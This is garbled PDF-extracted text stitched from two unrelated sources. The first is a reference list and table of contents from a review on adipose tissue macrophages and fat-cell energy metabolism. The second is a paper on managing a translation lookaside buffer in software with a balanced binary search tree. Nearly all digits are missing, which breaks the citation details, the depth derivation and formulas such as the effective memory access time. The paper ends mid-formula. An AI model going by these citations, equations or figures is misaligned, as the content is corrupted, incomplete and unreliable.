/pnas. ) nøhr mk, bobba n, richelsen b, lund s & pedersen sb. inflammation downregulates ucp expression in brown adipocytes potentially via sirt and dbc interaction. international journal of molecular sciences e . (https://doi.org/ . / ijms ) goto t, naknukool s, yoshitake r, hanafusa y, tokiwa s, li y, sakamoto t, nitta t, kim m, takahashi n, et al. proinflammatory cytokine interleukin- β suppresses cold-induced thermogenesis in adipocytes. cytokine – . (https://doi.org/ . /j. cyto. . . ) dahlman i, forsgren m, sjögren a, nordström ea, kaaman m, näslund e, attersand a & arner p. downregulation of electron transport chain genes in visceral adipose tissue in type diabetes independent of obesity and possibly involving tumor necrosis factor-α. diabetes – . (https://doi.org/ . /db - ) wolf y, boura-halfon s, cortese n, haimon z, sar shalom h, kuperman y, kalchenko v, brandis a, david e, segal-hayoun y, et al. brown-adipose-tissue macrophages control tissue innervation this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jappl. . . . https://doi.org/ . /jappl. . . . https://doi.org/ . /j.molmet. . . https://doi.org/ . /j.molmet. . . https://doi.org/ . /jlr.m -jlr https://doi.org/ . /jlr.m -jlr https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /jc. - https://doi.org/ . /jcs. https://doi.org/ . /jcs. https://doi.org/ . /archinte. . . https://doi.org/ . /archinte. . . https://doi.org/ . /ajpendo. . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /oby. . https://doi.org/ . /oby. . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /diabetes. . . https://doi.org/ . /ajpendo. . https://doi.org/ . /jc. - https://doi.org/ . /pnas. . . https://doi.org/ . /pnas. . . https://doi.org/ . /ijo. . https://doi.org/ . /ijo. . https://doi.org/ . /jbc.m . https://doi.org/ . /jbc.m https://doi.org/ . /jbc.m https://doi.org/ . /en. - https://doi.org/ . /ajpendo. . https://doi.org/ . /ajpendo. . https://doi.org/ . /fendo. . https://doi.org/ . /bbrc. . https://doi.org/ . /bbrc. . https://doi.org/ . /en. - https://doi.org/ . /en. - https://doi.org/ . /pnas. https://doi.org/ . /pnas. https://doi.org/ . /ijms https://doi.org/ . /ijms https://doi.org/ . /j.cyto. . . https://doi.org/ . /j.cyto. . . https://doi.org/ . /db - https://doi.org/ . /db - https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r pb–r : and homeostatic energy expenditure. nature immunology – . (https://doi.org/ . /ni. ) camell cd, sander j, spadaro o, lee a, nguyen ky, wing a, goldberg el, youm yh, brown cw, elsworth j, et al. inflammasome- driven catecholamine catabolism in macrophages blunts lipolysis during ageing. nature – . (https://doi.org/ . / nature ) balter nj & schwartz sl. accumulation of norepinephrine by macrophages and relationships to known uptake processes. journal of pharmacology and experimental therapeutics – . fabbiano s, suárez-zamorano n, rigo d, veyrat-durebex c, stevanovic dokic a, colin dj & trajkovski m. caloric restriction leads to browning of white adipose tissue through type immune signaling. cell metabolism – . (https://doi. org/ . /j.cmet. . . ) kim kh, kim yh, son je, lee jh, kim s, choe ms, moon jh, zhong j, fu k, lenglin f, et al. intermittent fasting promotes adipose thermogenesis and metabolic homeostasis via vegf-mediated alternative activation of macrophage. cell research – . (https://doi.org/ . /cr. . ) bartelt a & heeren j. adipose tissue browning and metabolic health. nature reviews: endocrinology – . (https://doi. org/ . /nrendo. . ) abdullahi a, chen p, stanojcic m, sadri ar, coburn n & jeschke mg. il- signal from the bone marrow is required for the browning of white adipose tissue post burn injury. shock – . (https:// doi.org/ . /shk. ) han j, meng q, shen l & wu g. interleukin- induces fat loss in cancer cachexia by promoting white adipose tissue lipolysis and browning. lipids in health and disease . (https://doi. org/ . /s - - - ) knudsen jg, murholm m, carey al, biensø rs, basse al, allen tl, hidalgo j, kingwell ba, febbraio ma, hansen jb, et al. role of il- in exercise training- and cold-induced ucp expression in subcutaneous white adipose tissue. plos one e . (https://doi.org/ . /journal.pone. ) babaei r, schuster m, meln i, lerch s, ghandour ra, pisani df, bayindir-buchhalter i, marx j, wu s, schoiswohl g, et al. jak-tgfβ cross-talk links transient adipose tissue inflammation to beige adipogenesis. science signaling eaai . (https://doi. org/ . /scisignal.aai ) lizcano f, vargas d, gómez Á & torrado a. human admc- derived adipocyte thermogenic capacity is regulated by il- receptor. stem cells international . (https://doi. org/ . / / ) shiau my, lu hf, chang yh, chiu yc & shih yl. characterization of proteins regulated by interleukin- in t -l adipocytes. springerplus . (https://doi.org/ . /s - - - ) cautivo km & molofsky ab. regulation of metabolic health and adipose tissue function by group innate lymphoid cells. european journal of immunology – . (https://doi.org/ . / eji. ) villarroya f, cereijo r, villarroya j, gavaldà-navarro a & giralt m. toward an understanding of how immune cells control brown and beige adipobiology. cell metabolism – . (https://doi. org/ . /j.cmet. . . ) miller le, jüsten hp, schölmerich j & straub rh. the loss of sympathetic nerve fibers in the synovial tissue of patients with rheumatoid arthritis is accompanied by increased norepinephrine release from synovial macrophages. faseb journal – . (https://doi.org/ . /fj. - com) spengler rn, chensue sw, giacherio da, blenk n & kunkel sl. endogenous norepinephrine regulates tumor necrosis factor-α production from macrophages in vitro. journal of immunology – . wankhade ud, lee jh, dagur pk, yadav h, shen m, chen w, kulkarni ab, mccoy jp, finkel t, cypess am, et al. tgf-β receptor regulates progenitors that promote browning of white fat. molecular metabolism – . (https://doi.org/ . /j. molmet. . . ) yadav h, quijano c, kamaraju ak, gavrilova o, malek r, chen w, zerfas p, zhigang d, wright ec, stuelten c, et al. protection from obesity and diabetes by blockade of tgf-β/smad signaling. cell metabolism – . (https://doi.org/ . /j. cmet. . . ) petrus p, mejhert n, corrales p, lecoutre s, li q, maldonado e, kulyté a, lopez y, campbell m, acosta jr, et al. transforming growth factor-β regulates adipocyte number in subcutaneous white adipose tissue. cell reports .e – .e . (https://doi.org/ . /j. celrep. . . ) pallotta i, sun b, wrona ea & freytes do. bmp protein-mediated crosstalk between inflammatory cells and human pluripotent stem cell- derived cardiomyocytes. journal of tissue engineering and regenerative medicine – . (https://doi.org/ . /term. ) tseng yh, kokkotou e, schulz tj, huang tl, winnay jn, taniguchi cm, tran tt, suzuki r, espinoza do, yamamoto y, et al. new role of bone morphogenetic protein in brown adipogenesis and energy expenditure. nature – . (https://doi. org/ . /nature ) gustafson b, hammarstedt a, hedjazifar s, hoffmann jm, svensson pa, grimsby j, rondinone c & smith u. bmp and bmp antagonists regulate human white and beige adipogenesis. diabetes – . (https://doi.org/ . /db - ) modica s, straub lg, balaz m, sun w, varga l, stefanicka p, profant m, simon e, neubauer h, ukropcova b, et al. bmp promotes a brown to white-like adipocyte shift. cell reports – . (https://doi.org/ . /j.celrep. . . ) whittle aj, carobbio s, martins l, slawik m, hondares e, vázquez mj, morgan d, csikasz ri, gallego r, rodriguez-cuenca s, et al. bmp b increases brown adipose tissue thermogenesis through both central and peripheral actions. cell – . (https:// doi.org/ . /j.cell. . . ) pellegrinelli v, peirce vj, howard l, virtue s, türei d, senzacqua m, frontini a, dalley jw, horton ar, bidault g, et al. adipocyte-secreted bmp b mediates adrenergic-induced remodeling of the neuro- vascular network in adipose tissue. nature communications . (https://doi.org/ . /s - - -x) schulz tj & tseng yh. emerging role of bone morphogenetic proteins in adipogenesis and energy metabolism. cytokine and growth factor reviews – . (https://doi.org/ . /j. cytogfr. . . ) varga t, mounier r, patsalos a, gogolák p, peloquin m, horvath a, pap a, daniel b, nagy g, pintye e, et al. macrophage pparγ, a lipid activated transcription factor controls a growth factor gdf and skeletal muscle regeneration. immunity – . (https:// doi.org/ . /j.immuni. . . ) hinoi e, nakamura y, takada s, fujita h, iezaki t, hashizume s, takahashi s, odaka y, watanabe t & yoneda y. growth differentiation factor- promotes brown adipogenesis in systemic energy expenditure. diabetes – . (https://doi. org/ . /db - ) kim jm, kosak jp, kim jk, kissling g, germolec dr, zeldin dc, bradbury ja, baek sj & eling te. nag- /gdf transgenic mouse has less white adipose tissue and a reduced inflammatory response. mediators of inflammation – . (https://doi. org/ . / / ) onishi y, fukasawa k, ozaki k, iezaki t, yoneda y & hinoi e. gdf is a novel mediator of macrophage infiltration in brown adipose tissue of obese mice. biochemistry and biophysics reports – . (https://doi.org/ . /j.bbrep. . . ) this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /ni. https://doi.org/ . /nature https://doi.org/ . /nature https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /cr. . https://doi.org/ . /nrendo. . https://doi.org/ . /nrendo. . https://doi.org/ . /shk. https://doi.org/ . /shk. https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /journal.pone. https://doi.org/ . /scisignal.aai https://doi.org/ . /scisignal.aai https://doi.org/ . / / https://doi.org/ . / / https://doi.org/ . /s - - - https://doi.org/ . /eji. https://doi.org/ . /eji. https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /fj. - com https://doi.org/ . /j.molmet. . . https://doi.org/ . /j.molmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.celrep. . . https://doi.org/ . /j.celrep. . . https://doi.org/ . /term. https://doi.org/ . /nature https://doi.org/ . /nature https://doi.org/ . /db - https://doi.org/ . /j.celrep. . . https://doi.org/ . /j.cell. . . https://doi.org/ . /j.cell. . . https://doi.org/ . /s - - -x https://doi.org/ . /j.cytogfr. . . https://doi.org/ . /j.cytogfr. . . https://doi.org/ . /j.immuni. . . https://doi.org/ . /j.immuni. . . https://doi.org/ . /db - https://doi.org/ . /db - https://doi.org/ . / / https://doi.org/ . / / https://doi.org/ . /j.bbrep. . . https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : adela r & banerjee sk. gdf- as a target and biomarker for diabetes and cardiovascular diseases: a translational prospective. journal of diabetes research . (https://doi. org/ . / / ) shen jj, huang l, li l, jorgez c, matzuk mm & brown cw. deficiency of growth differentiation factor protects against diet- induced obesity by selectively acting on white adipose. molecular endocrinology – . (https://doi.org/ . /me. - ) modica s & wolfrum c. the dual role of bmp in adipogenesis and metabolism. adipocyte – . (https://doi.org/ . / . . ) emmerson pj, wang f, du y, liu q, pickard rt, gonciarz md, coskun t, hamang mj, sindelar dk, ballman kk, et al. the metabolic effects of gdf are mediated by the orphan receptor gfral. nature medicine – . (https://doi.org/ . /nm. ) kelly b & o’neill la. metabolic reprogramming in macrophages and dendritic cells in innate immunity. cell research – . (https://doi.org/ . /cr. . ) sugimoto m, sakagami h, yokote y, onuma h, kaneko m, mori m, sakaguchi y, soga t & tomita m. non-targeted metabolite profiling in activated macrophage secretion. metabolomics – . (https://doi.org/ . /s - - - ) carrière a, jeanson y, berger-müller s, andré m, chenouard v, arnaud e, barreau c, walther r, galinier a, wdziekonski b, et al. browning of white adipose cells by intermediate metabolites: an adaptive mechanism to alleviate redox pressure. diabetes – . (https://doi.org/ . /db - ) hanatani s, motoshima h, takaki y, kawasaki s, igata m, matsumura t, kondo t, senokuchi t, ishii n, kawashima j, et al. acetate alters expression of genes involved in beige adipogenesis in t -l cells and obese kk-ay mice. journal of clinical biochemistry and nutrition – . (https://doi. org/ . /jcbn. - ) sahuri-arisoylu m, brody lp, parkinson jr, parkes h, navaratnam n, miller ad, thomas el, frost g & bell jd. reprogramming of hepatic fat accumulation and ‘browning’ of adipose tissue by the short-chain fatty acid acetate. international journal of obesity – . (https://doi.org/ . /ijo. . ) dalli j & serhan cn. specific lipid mediator signatures of human phagocytes: microparticles stimulate macrophage efferocytosis and pro-resolving mediators. blood e –e . (https://doi. org/ . /blood- - - ) masoodi m, kuda o, rossmeisl m, flachs p & kopecky j. lipid signaling in adipose tissue: connecting inflammation and metabolism. biochimica et biophysica acta – . (https://doi.org/ . /j.bbalip. . . ) endo y, blinova k, romantseva t, golding h & zaitseva m. differences in pge production between primary human monocytes and differentiated macrophages: role of il- β and trif/irf . plos one e . (https://doi.org/ . /journal.pone. ) garcía-alonso v, titos e, alcaraz-quiles j, rius b, lopategi a, lópez- vicario c, jakobsson pj, delgado s, lozano j & clària j. prostaglandin e exerts multiple regulatory actions on human obese adipose tissue remodeling, inflammation, adaptive thermogenesis and lipolysis. plos one e . (https://doi.org/ . /journal. pone. ) suárez j, rivera p, arrabal s, crespillo a, serrano a, baixeras e, pavón fj, cifuentes m, nogueiras r, ballesteros j, et al. oleoylethanolamide enhances β-adrenergic-mediated thermogenesis and white-to-brown adipocyte phenotype in epididymal white adipose tissue in rat. disease models and mechanisms – . (https://doi.org/ . /dmm. ) caër c, rouault c, roy tl, poitou c, aron-wisnewsky j, torcivia a, bichet jc, clément k, guerre-millo m & andré s. immune cell- derived cytokines contribute to obesity-related inflammation, fibrogenesis and metabolic deregulation in human adipose tissue. scientific reports . (https://doi.org/ . /s - - -w) wang b, fu x, liang x, deavila jm, wang z, zhao l, tian q, zhao j, gomez na, trombetta sc, et al. retinoic acid induces white adipose tissue browning by increasing adipose vascularity and inducing beige adipogenesis of pdgfrα+ adipose progenitors. cell discovery . (https://doi.org/ . /celldisc. . ) darwich l, coma g, peña r, bellido r, blanco ejj, este ja, borras fe, clotet b, ruiz l, rosell a, et al. secretion of interferon-γ by human macrophages demonstrated at the single-cell level after costimulation with interleukin (il)- plus il- . immunology – . (https://doi.org/ . /j. - . . .x) moisan a, lee yk, zhang jd, hudak cs, meyer ca, prummer m, zoffmann s, truong hh, ebeling m, kiialainen a, et al. white-to- brown metabolic conversion of human adipocytes by jak inhibition. nature cell biology – . (https://doi.org/ . /ncb ) cypess am, lehman s, williams g, tal i, rodman d, goldfine ab, kuo fc, palmer el, tseng yh, doria a, et al. identification and importance of brown adipose tissue in adult humans. new england journal of medicine – . (https://doi.org/ . / nejmoa ) porter c, chondronikola m & sidossis ls. the therapeutic potential of brown adipocytes in humans. frontiers in endocrinology . (https://doi.org/ . /fendo. . ) nedergaard j & cannon b. the browning of white adipose tissue: some burning issues. cell metabolism – . (https://doi. org/ . /j.cmet. . . ) received in final form may accepted may accepted preprint published online may this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . / / https://doi.org/ . / / https://doi.org/ . /me. - https://doi.org/ . /me. - https://doi.org/ . / . . https://doi.org/ . / . . https://doi.org/ . /nm. https://doi.org/ . /cr. . https://doi.org/ . /s - - - https://doi.org/ . /db - https://doi.org/ . /jcbn. - https://doi.org/ . /jcbn. - https://doi.org/ . /ijo. . https://doi.org/ . /blood- - - https://doi.org/ . /blood- - - https://doi.org/ . /j.bbalip. . . https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /dmm. https://doi.org/ . /s - - -w https://doi.org/ . /s - - -w https://doi.org/ . /celldisc. . https://doi.org/ . /j. - . . .x https://doi.org/ . /ncb https://doi.org/ . /nejmoa https://doi.org/ . /nejmoa https://doi.org/ . /fendo. . https://doi.org/ . /j.cmet. . . https://doi.org/ . /j.cmet. . . https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction adipose tissue macrophages (atmΦ) mΦ number increases in human white adipose tissue during obesity the local accumulation of atmΦ in obese wat the physiological importance of dynamic atmΦ for wat biology atmΦ display a mixed phenotype in obese wat the bioenergetics of human white fat cells mitochondrial activity is important for lipid storage and secretory function of human white adipocytes the bioenergetic profile of (pre-)adipocytes and the regulation by nutrients and hormones obesity-induced changes in the bioenergetics of white adipocytes linking atmΦ to human adipocyte bioenergetics atmΦ and secreted factors affect glucose metabolism/glycolysis of adipocytes the molecular identity of atmΦ released factors reducing adipose energy metabolism mediators between atmΦ and increased adipose energy metabolism conclusion and outlook declaration of interest funding acknowledgments references paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - software tlb management method based on balanced binary tree chen hongyu school of computer science and engineering xi’an technological university xi’an, china e-mail: @ .cn zhang yuke school of computer science and engineering xi’an technological university xi’an, china e-mail: @ .cn zhao li school of computer science and engineering xi’an technological university xi’an, china e-mail: zhaoli @ .com ai jian school of computer science and engineering xi’an technological university xi’an, china e-mail: aijianup@ .com abstract—purpose: with the development of the computer system, there is a higher request to reduce the failure times of translation look—aside buffer and relieve the failure influence, normal solution is deal with tlb failure by software or hardware, it find the page table and then implement the index operation to locate the page want. method: in order to satisfy the needs of software management method for mapping speed from virtual address to physical address and to expand the size of tlb, our team design a software management method based on balanced binary search tree. page management is implemented in software management, tlb is managed by operating system based on abstract model, and mmu (memory management unit) is no longer used unit, our team build a balanced binary tree to search tlb. result: binary search tree has the advantage of pruning in the interval search problem under the balanced state. therefore, searching tlb by this method is conducive to the expansion of tlb capacity, making space for cache and other performance improvement designs on chip and reducing costs. however, the search speed is reduced and some time is sacrificed to free up cpu space. conclusion: this method can free up cpu design space, also can expand more size of tlb and reduce the cost, its optimization algorithm is worthy of further research. keywords-component; tlb; balance binary tree; management of software i. introduction with the continuous development of the computer, the speed of cpu is faster and faster, but the speed of memory has not been improved. the development of tlb will help computer to process large virtual address. in this paper, our team design a tlb software management method of constructing a balanced binary search tree based on virtual page number. when the tlb capacity of balanced binary search tree is large, the method could deal with it quickly, for example, the number of virtual page numbers in balanced state is doubled, and the average retrieval times only need to be increased once. therefore, the retrieval speed is fast, the capacity increases, and the hit rate will also increase. moreover, the time cost of tree building is evenly distributed in each search, and the average search time decreases. the balanced binary search tree is used to cut the interval search the advantage of branch and search is to quickly search the virtual page number and locate it to the corresponding location of the memory. because the page number needs to be searched many times, it helps to deal with the large virtual space. ii. tlb most programs always visit a few pages many times, so tlb records frequent pages and their information, which can accelerate the mapping from virtual address to physical address. international journal of advanced network, monitoring and controls volume , no. , the basic unit of tlb internal storage is the page table item, which corresponds to the page table item stored in ram, the more tlb capacity, the more page table items can be stored, and increase the probability of tlb hit rate. due to the limited capacity of tlb, ram page table and tlb page table items cannot be one-to-one correspondence. a. location tlb is used to cache some tab table entries. tlb can be between cpu and cpu cache, or between cpu cache and main memory, depending on whether cache uses physical addressing or virtual addressing. if the cache is a virtual addressing, the addressing request is sent directly from the cpu to the cache, and then the required tlb entries are accessed from the cache. if the cache uses physical addressing, the cpu will first perform for each memory operation and send the obtained physical address to the cache. each method has its own advantages and disadvantages. b. common optimization a common optimization of cache with physical addressing is parallel tlb search and cache access. the lower bits of all virtual addresses (e.g., the lower bits in the virtual address when there is a kb tab in the virtual memory system) represent the address offset (in page address) of the requested address within the paging, and these bits will not change during the transition from the virtual address to the physical address. the process of accessing the cpu cache consists of two steps: use an index to find the corresponding entries in the cpu cache data store, and then compare the corresponding tags of the cpu cache entries found. if the cache is indexed by the same page address during the translation of addresses, the translation of higher bits of virtual and real address (i.e. page to page address / page number of pages) on tlb and the "index" operation of cpu cache can be performed in parallel. the page number of the physical address obtained from the tlb is then sent to the cpu cache. the cpu cache compares page number tags to determine whether the access is missing or missing. it is also possible to perform tlb search and cpu cache access in parallel, even if the cpu cache must use some bits that may change after address translation. refer to the address translation section of cache entry for further details on cache and tlb under virtual addressing. iii. algorithm of balanced binary search tree balanced binary tree has the following properties: it is an empty tree or the absolute value of the height difference between its left and right sub trees is no more than , and the left and right sub trees are both balanced binary tree. a. insert operation inserting a new node into the balanced binary tree destroys the balance of the balanced binary tree. first of all, our team need to find the pointer of the root node of the minimum sub tree which is out of balance after inserting a new node. then adjust the link relationship between the nodes in the sub tree to make it a new balanced sub tree. when the unbalanced minimum sub tree is adjusted to a balanced sub tree, all the other unbalanced sub trees do not need to be adjusted. ll type adjustment: insert a node on the left sub tree of point b. after insertion, the balance factor of the left sub tree of point b becomes and that of node a becomes . in this way, it can see that the sub tree with node a as the root node is the minimum unbalanced sub tree. when adjusting, the left child b of a is rotated to the right instead of a as the root node of the original unbalanced sub tree, and the lower right rotation of the node of a is called the root node of the right sub tree of b, and the original right sub tree of b becomes the left sub tree of a. in the binary search tree insertion and deletion operations, the advantage of using balanced tree is to make the tree structure better, so as to improve the speed of search operation. the disadvantage is that the insertion and deletion operations become more complicated, which reduces their operation speed. the operation of the imbalance caused by deleting a node in a binary search tree is more complex than that of inserting a node, so it will not be discussed here. b. avl deletion like the insert operation, deleting a node may break the balance, which requires us to adjust the balance when deleting. the deletion is divided into the following situations:  first, search the whole binary tree for the node to be deleted. if it is not found, it will be returned without processing. otherwise, the following operations will be performed.the node to be deleted is the current root node t.if the left and right sub trees are not empty. the deletion operation is implemented in the higher sub tree.  the height of the left sub tree is greater than that of the right sub tree. assign the largest international journal of advanced network, monitoring and controls volume , no. , element in the left sub tree to the current root node, and then delete the node with the largest element value in the left sub tree.  if the height of the left sub tree is less than that of the right sub tree, assign the smallest element in the right sub tree to the current root node, and then delete the node with the smallest element value in the right sub tree.  if one of the left and right sub trees is empty, replace the current root node with the non empty sub tree or null.  if the element value of the node to be deleted is less than the t value of the current root node, delete it in the left sub tree.  recursively, delete in the left sub tree. this is to determine whether the current root node still meets the equilibrium condition. if the equilibrium condition is satisfied, only the height information of the current root node t needs to be updated. otherwise, rotation adjustment is required. if the height of the left sub tree of the left child node of t is greater than the height of the right sub tree of the left child node of t, the corresponding single rotation is performed. otherwise, double rotation is performed. the element value of the node to be deleted is greater than the t value of the current root node. delete it in the right sub tree. c. summary:  non leaf nodes have at most two child nodes.  the value of non leaf node is larger than that of left child node and less than that of right child node.  the difference in the number of levels on the left and right sides of the tree is no more than .  there are no nodes with identical values. iv. design scheme the application of page number can be approximately regarded as a combination of mass or partially ordered intervals over time. when the cpu offer page number request, the operating system first searches the balanced binary search tree about page number in tlb, and compares the root node with the request page number. if the page number of the root node is greater than the request page number, the operating system first searches the balanced binary search tree of the tlb, recursively search in the left sub tree. if the page number of the root node is less than the request page number, then it is recursively searched in the right sub tree. if the page number of the root node is exactly equal to the request page number, the query is considered successful. the corresponding physical block will read out, and the adder is used to splice the address in the page to convert it into the corresponding physical address. a. recursion exit therefore, there are two exits for the end of recursion.  one is that the access is successful and the corresponding physical address is obtained;  the other is that the left or right sub tree of the root node is empty. if the access fails, there is no corresponding page number in the tlb. the operating system will retrieve the page table in memory, call the corresponding page table entry into tlb, and insert it into the balanced binary search of the tlb according to the page table entry in the tree. when the balanced binary tree constructed by tlb is full, it is necessary to replace the oldest page table entries. for deleting a page table item, it is necessary to set different flag bits for replacement operation which accord to the corresponding replacement algorithm. deletion will also cause imbalance, it is necessary to balance the binary search tree first after deletion. - - - - - - - - left tree index virtual page number right tree index figure . model international journal of advanced network, monitoring and controls volume , no. , start cpu put forward the requests of virtual page number search root node equal root virtual page? add the frame number and address in the page search left tree recursively left tree is empty? is virtual page number greater than the root node page number? visit the storage search right tree recursively right tree is empty? end empty tree? n tlb failure tlb failure success n y failure n y n y y figure . search step v. tlb storage a typical page table entry includes page frame number, protection bit, modification bit (dirty bit), access bit, cache forbidden bit and on / off bit. tlb has virtual page number, significant bit, modification bit, protection bit, page frame number, root node index bit of left and right sub tree, balance factor and so on. significant protect modify page number left tree index right tree number balance page frame number figure . item a. composition the virtual page number marks the page corresponding to the table item, and the significant bit records whether the table entry is used or not, whether the table item has been modified, the read / write and execution permissions of the protection bit record, and the setting of index bit and balance factor bit of the root node of the left and right sub trees are determined by comparing the size of the root node with that of the root node to determine whether the search of the left and right sub trees is recursive . the node stores the index of the left and right child nodes, and then stores the balance factor (the balance factor is only , , -in three cases, if the absolute value exceeds , then the balanced binary search tree is judged to be unbalanced). international journal of advanced network, monitoring and controls volume , no. , when the tlb is full, some page table items need to be eliminated. therefore, according to the corresponding page replacement algorithm, different flag bits are flexibly set to mark the page table items that should be eliminated; the row significant bit is that when the system starts, each tlb row is empty, and the information in it is invalid in order to show whether the information in the tlb row is valid, each row has a significant bit. by clearing the significant bit of the row, the corresponding page table item is eliminated. note: setting the global bit in a page directory/table entry will prevent that entry from being flushed. this is useful for pinning interrupt handlers in place. b. alternate method an alternate method is to use instruction, which should be used instead of the above method when doing small mapping modifications (creation, removing, changing.) instruction is mostly used in page not mapping and remapping routines in order to invalidate a previous cached translation. if instruction or some other tlb flush method had not been used, the mapping would remain cached, producing undefined consequences. however, please note that the instruction instruction was introduced in the i isa and is not part of the i isa, thereby requiring a properly written i - compatible kernel to use conditional inclusion of relevant code at compilation time depending on the target machine. the above is more complicated in the multiprocessor case. if another processor could also be affected by a page table write (because of shared memory, or multiple threads from the same process), it must also flush the tlb on those processors. this will require some form of inter-processor communication. vi. mathematical verification time complexity: the difference between height of the left sub tree and the right sub-tree is no more than . our team assumed that nh is the minimum number of nodes in the balanced binary tree with depth h. from the method of recursion recursion, the result is nh = nh- + nh- + ( is the root node), and the minimum search length is deduced. therefore, the equation can be obtained by the characteristic equation method.  =  the result is   then our team assign the special solution is n = c, replace it into the former formula, and the result is c = - , so the general term formula can be obtained. c  n +c  n - therefore, the equation can be obtained. ( + ) ) (  n + ) )( (   n - and then figure the equation n< ) ( log   n < log ) ( n according to the characteristics of the tree, the maximum depth of the balanced binary tree with n nodes is log n, and the average search length is log n approximately. vii. modern operating system in modern processor, software uses virtual address to access memory, and mmu unit of processor is responsible for converting virtual address to physical address. in order to complete this mapping process, software and hardware jointly maintain a multilevel mapping page table. when the processor finds that the page table cannot be mapped to the corresponding physical address, it will trigger a page missing exception and suspend the error process. the operating system software needs to handle the page missing exception. a. content tlb is specifically used to cache page table entries in memory, usually inside the mmu unit. tlb is a very small cache, and the number of tlb entries is relatively small. each tlb entry contains information about a page, such as significant bit, virtual page number, modified bit, physical page frame number, etc. when the processor wants to access a virtual address, it will first query in the tlb.  if there is no corresponding entry in the tlb table entry, it is called tlb miss, then need to access the page table to calculate the corresponding physical address. if there is a corresponding entry in the tlb table entry, the physical address is directly obtained from the tlb table entry, which is called tlb hit. international journal of advanced network, monitoring and controls volume , no. ,  the basic unit of tlb internal storage is tlb table entries. the larger the tlb capacity, the more tlb entries can be stored, and the higher the tlb hit rate. however, the capacity of tlb is limited. at present, the linux kernel uses kb small pages by default. if a program uses small pages, it needs at least tlb entries to ensure that tlb miss will not occur. however, if a mb page is used, only one tlb table entry is needed to ensure that tlb miss will not occur. for large applications that consume memory in gigabytes, large pages in gb can also be used to reduce tlb miss.  because accessing the page table in memory is relatively time-consuming, especially when multilevel page tables are widely used nowadays, multiple memory accesses are required. in order to speed up the access, the system designer has designed a hardware cache tlb for page table. the cpu will first look it up in tlb, because it is very fast to find it in tlb. the reason why tlb is fast is that it contains a small number of entries. on the other hand, tlb is integrated into the cpu. it can run almost at the speed of the cpu. if an entry (tlb hit) containing the virtual address is found in the tlb, the corresponding physical address can be obtained directly from the entry. otherwise, unfortunately, tlb miss will occur, and the page table of the current process (paging structure caches may be used here). at this time, another part of the mmu, the table walk unit, is called out. the table in the mmu is page table. the method of using table walk unit hardware unit to find page table is called hardware tlb miss handling, which is usually adopted by cisc architecture processor (such as ia- ). it can't be found in page table, and it will be handled by software (operating system) when page fault appears. in contrast, software tlb miss handling, which is usually adopted by risc architecture processors (such as alpha), does not involve the cpu after tlb miss. the operating system searches the page table through software. the way to use hardware is faster, while the way to use software is more flexible. ia- provides a hybrid mode, which can take into account the advantages of both. if the p (present) bit of the entry corresponding to the virtual address is found in the page table, it indicates that the physical page corresponding to the virtual address currently resides in memory, that is, page table hit. there are still two things to do. since it can't find it in tlb, it's natural to update tlb. check the permissions, including read / write / executable permissions, user / supervisor mode permissions, etc. if it do not have the correct permissions, sigsegv (segmentation fault) will be triggered. if the p bit of entry corresponding to the virtual address is , page fault will be triggered. there may be several situations. b. address the virtual address has never been accessed after it has been allocated (for example, if there is no space allocated after allocation, the physical memory will not be allocated). after the page fault is triggered, the physical memory is allocated, that is, demand paging. after a certain demand is available, the system will allocate the p position to . the content of the corresponding physical page is swapped out to the external disk / flash. at this time, the page table entry stores the temporary location of the page in the external swap area. it can switch it back to physical memory, establish the mapping again, and then set p position . if the virtual address does not exist in the page table of the process, it means that the virtual address is not in the address space of the process. at this time, segmentation fault will also be triggered. the cpu’s mmu locates the page directory for the process using the special register mentioned above. the page directory index (from the first bits of the virtual address) is used to locate the pde that identifies the page table needed to map the virtual address to a physical one. the page table index (from the second bits of the virtual address) is used to locate the pte that maps the physical location of the virtual memory page referenced by the address. the pte is used to locate the physical page. if the virtual page is mapped to a page that is already in physical memory, the pte will contain the page frame number (pfn) of the page in physical memory that contains the data in question. (processors reference memory locations by pfn). international journal of advanced network, monitoring and controls volume , no. , figure . process c. steps in tlb hit:  cpu generates virtual address.  it is checked in tlb (present).  corresponding frame number is retrieved, which  now tells where in the main memory page lies. d. steps in page miss:  cpu generates virtual address.  it is checked in tlb (not present).  now the page number is matched to page table residing in main memory (assuming page table contains all pte).  corresponding frame number is retrieved, which now tells where in the main memory page lies.  the tlb is updated with new pte (if space is not there, one of the replacement technique comes into picture i.e either fifo, lru or mfu etc). e. conclusion effective memory access time(emat) : tlb is used to reduce effective memory access time as it is a high speed associative cache. emat = h*(c+m) + ( -h)*(c+ m) where, h = hit ratio of 